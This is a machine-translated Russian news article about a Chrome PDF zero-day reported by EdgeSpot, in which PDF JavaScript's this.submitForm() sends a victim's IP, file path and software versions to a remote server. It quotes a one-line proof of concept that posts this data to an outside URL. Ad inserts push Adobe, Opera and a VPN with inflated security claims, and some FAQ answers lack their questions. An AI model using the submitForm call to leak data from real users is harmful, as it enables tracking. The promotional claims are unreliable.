- EdgeSpot обнаружил интригующую уязвимость нулевого дня, использующую PDF-документы в Chrome.
- Этот уязвимость может навредить вам, собирая конфиденциальные данные на вашем компьютере.
- Изучите наши Страница в Интернете и облаке для получения дополнительной информации о других инструментах и услугах.
- Если вас интересуют браузеры, мы предоставим много информации о них в нашем Хаб браузеров.
Сделайте все свои документы доступными и безопасными с помощью Adobe Acrobat Reader. Этот инструмент управления документами также позволит вам ставить электронную подпись и создавать официальные формы, чтобы сэкономить ваше время на работе. Получите его для своего ПК, и вы сможете:
- Открывайте, печатайте и редактируйте все ваши PDF-файлы и файлы других типов.
- Заполнять PDF-формы проще
- Храните важные документы в зашифрованном виде
Получите все приложения по специальной цене!
Программное обеспечение для управления документами №1 в мире теперь по отличной цене, так что поторопитесь!
Сервис обнаружения эксплойтов EdgeSpot обнаружил интригующий Хром уязвимость нулевого дня, использующая PDF-документы.
Уязвимость позволяет злоумышленникам собирать конфиденциальные данные с использованием вредоносных PDF-документов, открытых в Chrome.
Как только жертва открывает соответствующие PDF-файлы в Google Chrome, вредоносная программа начинает работать в фоновом режиме, собирая пользовательские данные.
Затем данные пересылаются на удаленный сервер, который контролируется хакерами. Вам может быть интересно, какие данные забирают злоумышленники, они нацелены на следующие данные на вашем ПК:
- айпи адрес
- Полный путь к файлу PDF в системе
- Версии ОС и Chrome
Остерегайтесь файлов PDF, зараженных вредоносным ПО
Эксперты пятнистый что один из двух доменов readnotify [.] com или же burpcollaborator [.] net получал данные.
Выяснилось, что злоумышленники используют this.submitForm () PDF Javascript API для сбора конфиденциальной информации пользователей.
Мы протестировали его с минимальным PoC, простым вызовом API, например this.submitForm (‘ http://google.com/test’) заставит Google Chrome отправлять личные данные на google.com.
Эта ошибка Chrome использовалась двумя различными наборами вредоносных PDF-файлов, оба из которых были распространены в октябре 2017 года и сентябре 2018 года соответственно.
Примечательно, что собранные данные могут быть использованы злоумышленниками для точной настройки атак в будущем. Согласно отчетам, первая партия файлов была скомпилирована с помощью службы отслеживания PDF-файлов ReadNotify.
Пользователи могут использовать сервис для отслеживания просмотров пользователей. EdgeSpot не поделился какими-либо подробностями относительно природы второго набора файлов PDF.
Совет: измените свой браузер на Opera
В эти смутные времена мы подвергаемся атакам вредоносных программ, фишинга и троянов на каждом этапе, поэтому мы должны быть более бдительными и оставаться защищенными.
И поскольку это проблема, специфичная для Chrome, вы можете избежать этой и всех других угроз с помощью ориентированного на безопасность браузера, такого как Опера.
В этом браузере есть встроенный блокировщик рекламы, который не только убирает отвлекающие факторы, но и блокирует скрипты аналитики, пиксели отслеживания и методы сбора ваших данных.
А если вы хотите быть абсолютно уверены в том, что держитесь подальше от любой опасности, отойдите за встроенный VPN услуга, которая на 100% бесплатна для использования в течение неограниченного времени.
Опера
Opera предлагает идеальную защиту от угроз с помощью встроенного блокировщика рекламы и бесплатного VPN-сервиса!
Посетить вебсайт
Как я могу защитить себя от уязвимостей PDF?
Скачать Adobe Acrobat PRO
Adobe и Chrome отлично подходят для работы с PDF-файлами. Установив расширение Adobe для Chrome, вы можете просматривать PDF-файлы и изменять их по своему вкусу, не выходя из любимого браузера.
Несмотря на прочную структуру, вредоносные программы, скрытые в файлах PDF, могут не обнаруживаться, если вы используете стандартную версию Reader.
Профессиональная версия рекомендуется, чтобы гарантировать вашу защиту и защитить ваши данные от хакеров.
Хотя это не бесплатно, цена, которую вы заплатите, довольно мала за множество дополнительных функций, которые вам понравятся, включая повышенную безопасность ваших файлов PDF.
Также имеется 7-дневная бесплатная пробная версия, чтобы вы могли ощутить все возможности Pro, прежде чем совершить покупку.
Adobe Acrobat PRO
Держитесь подальше от вредоносных программ, загрузив Adobe Acrobat PRO. В ней гораздо больше функций, чем в бесплатной версии, и она обеспечивает безопасность ваших данных.
Посетить вебсайт
Если вы хотите обезопасить себя при серфинге в Интернете, вам понадобится специализированный инструмент для защиты вашей сети. Установите частный доступ в Интернет прямо сейчас и обезопасить себя. Он защищает ваш компьютер от атак во время просмотра, маскирует ваш IP-адрес и блокирует любой нежелательный доступ.
Служба обнаружения эксплойтов EdgeSpot хотела предупредить пользователей Chrome о потенциальных рисках, поскольку не ожидалось, что патч будет выпущен в ближайшем будущем.
EdgeSpot сообщил Google об уязвимости в прошлом году, и компания пообещала выпустить патч в конце апреля.
Однако вы можете рассмотреть возможность использования временного решения проблемы, локально просмотрев полученные документы PDF с помощью другого приложения для чтения.
Кроме того, вы также можете открывать свои PDF-документы в Chrome, отключив свои системы от Интернета.
Часто задаваемые вопросы
Да, это так. Но если вы хотите более широкий выбор, изучите наши лучшие выборы для ХромКонфиденциальность расширения в это полное руководство.
Твот много расширений, которые позволяют PDF-файлы обработка. Проверять из нашего отличный гид о лучших расширениях PDF для Chrome.
Нет, но вы можете быстро активировать его. Вот наш подробное руководство о том, как включить генератор QR-кода в Chrome.
